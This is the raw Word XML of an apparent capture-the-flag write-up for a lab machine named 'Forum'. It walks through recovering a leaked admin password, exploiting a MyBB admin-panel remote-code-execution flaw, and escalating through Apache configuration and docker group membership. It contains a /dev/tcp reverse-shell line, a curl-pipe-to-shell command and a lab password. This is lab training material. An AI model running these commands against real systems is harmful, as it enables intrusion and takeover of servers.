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FORUM machine.If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4"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.x57okt3b9mpj" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>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gxhwg2zkqo9"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159000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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159000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>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C">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22 - SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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Port 80 - HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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When accessing port 80, we are redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://forum.hackingclub.com/</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need to map the IP address to the domain name by adding a line to the hosts file, as illustrated in the image above.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828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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Accessing it using the domain name, we find a forum created using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MyBB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> software.</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MyBB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a forum system software developed by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MyBB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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57500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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register.</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56"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registering, we can log in to the forum and begin exploring the posts.</w:t>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97100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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reviewing some posts, we find an interesting one </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Can anyone help me in developing an exploit?)</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 discussion, the forum administrator’s credentials were leaked.</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6500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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decode the Base64 string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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00100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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logging in with those credentials, we become admin, and we can see the MyBB version:</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19300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Searching for vulnerabilities in this version, we find the following exploit:</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Offensive Security's Exploit Database Archive:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50924</w:t>
        </w:r>
      </w:hyperlink>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affected versions (&lt;=1.8.29), the Admin CP configuration management module does not properly validate configuration types during insertion and updating. This allows adding configuration entries of type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 containing PHP code, which gets executed on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change Settings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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This results in a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">The vulnerable module requires Admin CP access with the permission: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can manage settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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can download the exploit to our machine and execute it. Now let’s create a reverse shell in bash:</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'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="711200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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host it using a Python server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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39800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Netcat listener to receive the connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Then we execute the exploit:</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python3 exploit.py --username "admin" --password 'Mw8tYv!A1201w^p' --host "http://forum.hackingclub.com" --cmd "curl &lt;ip-vpn&gt;/shell.sh|sh"</w:t>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exploit, we receive the shell.</w:t>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16000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.zcrtdpd8ott7" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell TTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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the simple shell to a fully interactive TTY:</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 fg</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90600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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users on the server, we see a user called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we do not have permission to access their home directory. We will likely need to escalate to that user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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41400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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When executing the command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sudo -l</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we can run the following commands below with root user permissions without needing to prov</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ide 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he password:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>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93800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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can list the Apache directory to check whether we have permission to modify any files. We see that we have write permissions on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache2.conf:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user is the default user that web servers on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu (Apache, nginx, for example)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use for normal operation. So we can modify this file and change the user from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">manager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51000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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saving the file, we execute:</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/usr/bin/systemctl reload apache2</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/usr/bin/systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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52500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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running the exploit again, we get a shell as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">manager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user and can read our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e see that we belong to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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This means we can mount the host filesystem inside a Docker container. First, let’s list available images </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker images:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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03300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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we have no images available on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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So we download an Alpine image on our local machine and transfer it to the server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo docker pull alpine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1066800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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export it:</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sudo docker save alpine &gt; alpine.tar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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03300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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Host it with a Python server and download it on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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092200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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31900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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image on the server, we import it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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723900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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mount the host filesystem inside Docker:</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docker run -v /:/mnt --rm -it alpine chroot /mnt sh</w:t>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06500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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this, we can retrieve our final flag 😀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41"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4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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66" name="image22.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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5">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6">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6.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48" name="image8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image8.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Forum</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05191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46"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6686550" cy="3005191"/>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6.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image" Target="media/image30.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.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11.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" 